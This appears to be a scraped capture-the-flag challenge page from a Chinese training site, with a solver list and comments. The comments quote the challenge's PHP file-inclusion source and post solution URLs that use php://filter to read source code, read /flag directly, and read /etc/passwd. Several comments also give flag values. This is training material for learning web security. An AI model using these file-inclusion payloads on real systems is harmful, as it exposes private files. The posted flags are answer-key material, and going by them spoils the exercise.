评分(11)
解题动态
yokoi 攻破了该题 9小时前
薄言. 攻破了该题 9小时前
店晓贰 攻破了该题 1天前
fenglian88 攻破了该题 2天前
moyi259 攻破了该题 3天前
JINY123 攻破了该题 3天前
zhaoguanjei 攻破了该题 3天前
10:43 攻破了该题 3天前
桃酥妮妮 攻破了该题 3天前
沈芷意 攻破了该题 3天前
真理喵 攻破了该题 4天前
bctivy99 攻破了该题 4天前
asdliuyan 攻破了该题 4天前
wubobo 攻破了该题 5天前
莫及 攻破了该题 5天前
小丽 攻破了该题 5天前
bugkuaccount3214 攻破了该题 5天前
heting 攻破了该题 5天前
GrantFly 攻破了该题 5天前
评论
bkyhack123 2年前
举报
<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr
bkyhack123 2年前
举报
<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr
fonddream 2年前
举报
http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg
大哥大 2年前
举报
http://114.67.175.224:11806/index.php?file=/flag Copy this url then you can get the flag.
nicchanggh 2年前
举报
flag{e92c0ec08be5fc7e0bd706e697e366fd}
chushou 2年前
举报
flag{ebfea7aca0bd16bb5819c678090ff026}
107zsm 2年前
举报
打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag
小夫 2年前
举报
file=/flag
rightstar 2年前
举报
flag{a1ad1a8522261e6b9abf21e9bd6ef675}
sibeil 3年前
举报
flag{b23328bbf165641292d9871be279459a}